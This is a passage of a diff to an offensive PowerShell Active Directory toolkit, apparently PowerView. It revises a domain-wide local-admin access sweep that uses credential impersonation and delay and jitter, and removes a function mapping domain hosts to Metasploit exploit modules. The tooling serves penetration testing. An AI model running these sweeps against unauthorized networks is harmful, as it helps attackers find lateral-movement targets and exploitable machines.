+        if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+        if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+        if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+        if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+        if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+        if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+        if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+        if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+        if ($PSBoundParameters['ComputerName']) {
+            $TargetComputers = $ComputerName
+        }
+        else {
+            Write-Verbose '[Find-LocalAdminAccess] Querying computers in the domain'
+            $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
+        }
+        Write-Verbose "[Find-LocalAdminAccess] TargetComputers length: $($TargetComputers.Length)"
+        if ($TargetComputers.Length -eq 0) {
+            throw '[Find-LocalAdminAccess] No hosts found to enumerate'
         }
 
-        # script block that enumerates a server
+        # the host enumeration block we're using to enumerate all servers
         $HostEnumBlock = {
-            param($ComputerName, $Ping)
+            Param($ComputerName, $TokenHandle)
 
-            $Up = $True
-            if($Ping) {
-                $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
+            if ($TokenHandle) {
+                # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+                $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
             }
-            if($Up) {
-                # check if the current user has local admin access to this server
-                $Access = Invoke-CheckLocalAdminAccess -ComputerName $ComputerName
-                if ($Access.IsAdmin) {
-                    $ComputerName
+
+            ForEach ($TargetComputer in $ComputerName) {
+                $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+                if ($Up) {
+                    # check if the current user has local admin access to this server
+                    $Access = Test-AdminAccess -ComputerName $TargetComputer
+                    if ($Access.IsAdmin) {
+                        $TargetComputer
+                    }
                 }
             }
-        }
-
-    }
-
-    process {
 
-        if($Threads) {
-            Write-Verbose "Using threading with threads = $Threads"
-
-            # if we're using threading, kick off the script block with Invoke-ThreadedFunction
-            $ScriptParams = @{
-                'Ping' = $(-not $NoPing)
+            if ($TokenHandle) {
+                Invoke-RevertToSelf
             }
-
-            # kick off the threaded script block + arguments 
-            Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
         }
 
-        else {
-            if(-not $NoPing -and ($ComputerName.count -ne 1)) {
-                # ping all hosts in parallel
-                $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
-                $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
+        $LogonToken = $Null
+        if ($PSBoundParameters['Credential']) {
+            if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential
             }
+            else {
+                $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
+            }
+        }
+    }
 
-            Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
-            $Counter = 0
+    PROCESS {
+        # only ignore threading if -Delay is passed
+        if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
 
-            ForEach ($Computer in $ComputerName) {
+            Write-Verbose "[Find-LocalAdminAccess] Total number of hosts: $($TargetComputers.count)"
+            Write-Verbose "[Find-LocalAdminAccess] Delay: $Delay, Jitter: $Jitter"
+            $Counter = 0
+            $RandNo = New-Object System.Random
 
+            ForEach ($TargetComputer in $TargetComputers) {
                 $Counter = $Counter + 1
 
                 # sleep for our semi-randomized interval
                 Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 
-                Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
-                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False
+                Write-Verbose "[Find-LocalAdminAccess] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+                Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $LogonToken
+            }
+        }
+        else {
+            Write-Verbose "[Find-LocalAdminAccess] Using threading with threads: $Threads"
+
+            # if we're using threading, kick off the script block with New-ThreadedFunction
+            $ScriptParams = @{
+                'TokenHandle' = $LogonToken
             }
+
+            # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+            New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
         }
     }
 }
 
 
-function Get-ExploitableSystem {
+function Find-DomainLocalGroupMember {
 <#
-    .Synopsis
-
-        This module will query Active Directory for the hostname, OS version, and service pack level  
-        for each computer account.  That information is then cross-referenced against a list of common
-        Metasploit exploits that can be used during penetration testing.
-
-    .DESCRIPTION
-
-        This module will query Active Directory for the hostname, OS version, and service pack level  
-        for each computer account.  That information is then cross-referenced against a list of common
-        Metasploit exploits that can be used during penetration testing.  The script filters out disabled
-        domain computers and provides the computer's last logon time to help determine if it's been 
-        decommissioned.  Also, since the script uses data tables to output affected systems the results
-        can be easily piped to other commands such as test-connection or a Export-Csv.
-
-    .PARAMETER ComputerName
-
-        Return computers with a specific name, wildcards accepted.
-
-    .PARAMETER SPN
-
-        Return computers with a specific service principal name, wildcards accepted.
-
-    .PARAMETER OperatingSystem
-
-        Return computers with a specific operating system, wildcards accepted.
-
-    .PARAMETER ServicePack
-
-        Return computers with a specific service pack, wildcards accepted.
-
-    .PARAMETER Filter
-
-        A customized ldap filter string to use, e.g. "(description=*admin*)"
-
-    .PARAMETER Ping
-
-        Switch. Ping each host to ensure it's up before enumerating.
-
-    .PARAMETER Domain
-
-        The domain to query for computers, defaults to the current domain.
-
-    .PARAMETER DomainController
-
-        Domain controller to reflect LDAP queries through.
+.SYNOPSIS
 
-    .PARAMETER ADSpath
+Enumerates the members of specified local group (default administrators)
+for all the targeted machines on the current (or specified) domain.
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction  
 
-    .PARAMETER Unconstrained
+.DESCRIPTION
 
-        Switch. Return computer objects that have unconstrained delegation.
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the members of the specified local
+group (default of Administrators) for each machine using Get-NetLocalGroupMember.
+By default, the API method is used, but this can be modified with '-Method winnt'
+to use the WinNT service provider.
 
-    .PARAMETER PageSize
+.PARAMETER ComputerName
 
-        The PageSize to set for the LDAP searcher object.
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
 
-    .PARAMETER Credential
+.PARAMETER ComputerDomain
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+Specifies the domain to query for computers, defaults to the current domain.
 
-    .EXAMPLE
-       
-        The example below shows the standard command usage.  Disabled system are excluded by default, but
-        the "LastLgon" column can be used to determine which systems are live.  Usually, if a system hasn't 
-        logged on for two or more weeks it's been decommissioned.      
-        PS C:\> Get-ExploitableSystem -DomainController 192.168.1.1 -Credential demo.com\user | Format-Table -AutoSize
-        [*] Grabbing computer accounts from Active Directory...
-        [*] Loading exploit list for critical missing patches...
-        [*] Checking computers for vulnerable OS and SP levels...
-        [+] Found 5 potentially vulnerable systems!
-        ComputerName          OperatingSystem         ServicePack    LastLogon            MsfModule                                      CVE                      
-        ------------          ---------------         -----------    ---------            ---------                                      ---                      
-        ADS.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 5:46:52 PM  exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....
-        ADS.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 5:46:52 PM  exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....
-        ADS.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 5:46:52 PM  exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....
-        LVA.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 1:44:46 PM  exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....
-        LVA.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 1:44:46 PM  exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....
-        LVA.demo.com          Windows Server 2003     Service Pack 2 4/8/2015 1:44:46 PM  exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....
-        assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....
-        assess-xppro.demo.com Windows XP Professional Service Pack 3 4/1/2014 11:11:54 AM exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....
-        HVA.demo.com          Windows Server 2003     Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....
-        HVA.demo.com          Windows Server 2003     Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....
-        HVA.demo.com          Windows Server 2003     Service Pack 2 11/5/2013 9:16:31 PM exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....
-        DB1.demo.com          Windows Server 2003     Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/dcerpc/ms07_029_msdns_zonename http://www.cvedetails....
-        DB1.demo.com          Windows Server 2003     Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms08_067_netapi            http://www.cvedetails....
-        DB1.demo.com          Windows Server 2003     Service Pack 2 3/22/2012 5:05:34 PM exploit/windows/smb/ms10_061_spoolss           http://www.cvedetails....                     
+.PARAMETER ComputerLDAPFilter
 
-    .EXAMPLE
+Specifies an LDAP query string that is used to search for computer objects.
 
-        PS C:\> Get-ExploitableSystem | Export-Csv c:\temp\output.csv -NoTypeInformation
+.PARAMETER ComputerSearchBase
 
-        How to write the output to a csv file.
-
-    .EXAMPLE
-
-        PS C:\> Get-ExploitableSystem -Domain testlab.local -Ping
-
-        Return a set of live hosts from the testlab.local domain
-
-     .LINK
-       
-       http://www.netspi.com
-       https://github.com/nullbind/Powershellery/blob/master/Stable-ish/ADS/Get-ExploitableSystems.psm1
-       
-     .NOTES
-       
-       Author:  Scott Sutherland - 2015, NetSPI
-                Modifications to integrate into PowerView by @harmj0y
-       Version: Get-ExploitableSystem.psm1 v1.1
-       Comments: The technique used to query LDAP was based on the "Get-AuditDSComputerAccount" 
-       function found in Carols Perez's PoshSec-Mod project.  The general idea is based off of  
-       Will Schroeder's "Invoke-FindVulnSystems" function from the PowerView toolkit.
-#>
-    [CmdletBinding()]
-    Param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [String]
-        $ComputerName = '*',
-
-        [String]
-        $SPN,
-
-        [String]
-        $OperatingSystem = '*',
-
-        [String]
-        $ServicePack = '*',
-
-        [String]
-        $Filter,
-
-        [Switch]
-        $Ping,
-
-        [String]
-        $Domain,
-
-        [String]
-        $DomainController,
-
-        [String]
-        $ADSpath,
-
-        [Switch]
-        $Unconstrained,
-
-        [ValidateRange(1,10000)] 
-        [Int]
-        $PageSize = 200,
-
-        [Management.Automation.PSCredential]
-        $Credential
-    )
-
-    Write-Verbose "[*] Grabbing computer accounts from Active Directory..."
-
-    # Create data table for hostnames, os, and service packs from LDAP
-    $TableAdsComputers = New-Object System.Data.DataTable 
-    $Null = $TableAdsComputers.Columns.Add('Hostname')       
-    $Null = $TableAdsComputers.Columns.Add('OperatingSystem')
-    $Null = $TableAdsComputers.Columns.Add('ServicePack')
-    $Null = $TableAdsComputers.Columns.Add('LastLogon')
-
-    Get-NetComputer -FullData @PSBoundParameters | ForEach-Object {
-
-        $CurrentHost = $_.dnshostname
-        $CurrentOs = $_.operatingsystem
-        $CurrentSp = $_.operatingsystemservicepack
-        $CurrentLast = $_.lastlogon
-        $CurrentUac = $_.useraccountcontrol
-
-        $CurrentUacBin = [convert]::ToString($_.useraccountcontrol,2)
-
-        # Check the 2nd to last value to determine if its disabled
-        $DisableOffset = $CurrentUacBin.Length - 2
-        $CurrentDisabled = $CurrentUacBin.Substring($DisableOffset,1)
-
-        # Add computer to list if it's enabled
-        if ($CurrentDisabled  -eq 0) {
-            # Add domain computer to data table
-            $Null = $TableAdsComputers.Rows.Add($CurrentHost,$CurrentOS,$CurrentSP,$CurrentLast)
-        }
-    }
-
-    # Status user        
-    Write-Verbose "[*] Loading exploit list for critical missing patches..."
-
-    # ----------------------------------------------------------------
-    # Setup data table for list of msf exploits
-    # ----------------------------------------------------------------
-
-    # Create data table for list of patches levels with a MSF exploit
-    $TableExploits = New-Object System.Data.DataTable 
-    $Null = $TableExploits.Columns.Add('OperatingSystem') 
-    $Null = $TableExploits.Columns.Add('ServicePack')
-    $Null = $TableExploits.Columns.Add('MsfModule')  
-    $Null = $TableExploits.Columns.Add('CVE')
-    
-    # Add exploits to data table
-    $Null = $TableExploits.Rows.Add("Windows 7","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows Server 2008 R2","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  
-    $Null = $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  
-    $Null = $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  
-    $Null = $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729")  
-    $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/")  
-    $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059")  
-    $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439")  
-    $Null = $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250")  
-
-    # Status user        
-    Write-Verbose "[*] Checking computers for vulnerable OS and SP levels..."
-
-    # ----------------------------------------------------------------
-    # Setup data table to store vulnerable systems
-    # ----------------------------------------------------------------
-
-    # Create data table to house vulnerable server list
-    $TableVulnComputers = New-Object System.Data.DataTable 
-    $Null = $TableVulnComputers.Columns.Add('ComputerName')
-    $Null = $TableVulnComputers.Columns.Add('OperatingSystem')
-    $Null = $TableVulnComputers.Columns.Add('ServicePack')
-    $Null = $TableVulnComputers.Columns.Add('LastLogon')
-    $Null = $TableVulnComputers.Columns.Add('MsfModule')
-    $Null = $TableVulnComputers.Columns.Add('CVE')
-
-    # Iterate through each exploit
-    $TableExploits | ForEach-Object {
-                 
-        $ExploitOS = $_.OperatingSystem
-        $ExploitSP = $_.ServicePack
-        $ExploitMsf = $_.MsfModule
-        $ExploitCVE = $_.CVE
-
-        # Iterate through each ADS computer
-        $TableAdsComputers | ForEach-Object {
-            
-            $AdsHostname = $_.Hostname
-            $AdsOS = $_.OperatingSystem
-            $AdsSP = $_.ServicePack                                                        
-            $AdsLast = $_.LastLogon
-            
-            # Add exploitable systems to vul computers data table
-            if ($AdsOS -like "$ExploitOS*" -and $AdsSP -like "$ExploitSP" ) {                    
-                # Add domain computer to data table                    
-                $Null = $TableVulnComputers.Rows.Add($AdsHostname,$AdsOS,$AdsSP,$AdsLast,$ExploitMsf,$ExploitCVE)
-            }
-        }
-    }
-    
-    # Display results
-    $VulnComputer = $TableVulnComputers | Select-Object ComputerName -Unique | Measure-Object
-    $VulnComputerCount = $VulnComputer.Count
-
-    if ($VulnComputer.Count -gt 0) {
-        # Return vulnerable server list order with some hack date casting
-        Write-Verbose "[+] Found $VulnComputerCount potentially vulnerable systems!"
-        $TableVulnComputers | Sort-Object { $_.lastlogon -as [datetime]} -Descending
-    }
-    else {
-        Write-Verbose "[-] No vulnerable systems were found."
-    }
-}
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
 
+.PARAMETER ComputerOperatingSystem
 
-function Invoke-EnumerateLocalAdmin {
-<#
-    .SYNOPSIS
+Search computers with a specific operating system, wildcards accepted.
 
-        This function queries the domain for all active machines with
-        Get-NetComputer, then for each server it queries the local
-        Administrators with Get-NetLocalGroup.
+.PARAMETER ComputerServicePack
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Search computers with a specific service pack, wildcards accepted.
 
-    .PARAMETER ComputerName
+.PARAMETER ComputerSiteName
 
-        Host array to enumerate, passable on the pipeline.
+Search computers in the specific AD Site name, wildcards accepted.
 
-    .PARAMETER ComputerFile
+.PARAMETER GroupName
 
-        File of hostnames/IPs to search.
+The local group name to query for users. If not given, it defaults to "Administrators".
 
-    .PARAMETER ComputerFilter
+.PARAMETER Method
 
-        Host filter name to query AD for, wildcards accepted.
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
 
-    .PARAMETER ComputerADSpath
+.PARAMETER Server
 
-        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+Specifies an Active Directory server (domain controller) to bind to.
 
-    .PARAMETER NoPing
+.PARAMETER SearchScope
 
-        Switch. Don't ping each host to ensure it's up before enumerating.
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
 
-    .PARAMETER Delay
+.PARAMETER ResultPageSize
 
-        Delay between enumerating hosts, defaults to 0
+Specifies the PageSize to set for the LDAP searcher object.
 
-    .PARAMETER Jitter
+.PARAMETER ServerTimeLimit
 
-        Jitter for the host delay, defaults to +/- 0.3
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-    .PARAMETER OutFile
+.PARAMETER Tombstone
 
-        Output results to a specified csv output file.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-    .PARAMETER NoClobber
+.PARAMETER Credential
 
-        Switch. Don't overwrite any existing output file.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
 
-    .PARAMETER TrustGroups
+.PARAMETER Delay
 
-        Switch. Only return results that are not part of the local machine
-        or the machine's domain. Old Invoke-EnumerateLocalTrustGroup
-        functionality.
-    
-    .PARAMETER DomainOnly
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
 
-        Switch. Only return domain (non-local) results  
+.PARAMETER Jitter
 
-    .PARAMETER Domain
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
 
-        Domain to query for machines, defaults to the current domain.
-    
-    .PARAMETER DomainController
+.PARAMETER Threads
 
-        Domain controller to reflect LDAP queries through.
+The number of threads to use for user searching, defaults to 20.
 
-    .PARAMETER SearchForest
+.EXAMPLE
 
-        Switch. Search all domains in the forest for target users instead of just
-        a single domain.
+Find-DomainLocalGroupMember
 
-    .PARAMETER API
+Enumerates the local group memberships for all reachable machines in the current domain.
 
-        Switch. Use API calls instead of the WinNT service provider. Less information,
-        but the results are faster.
+.EXAMPLE
 
-    .PARAMETER Threads
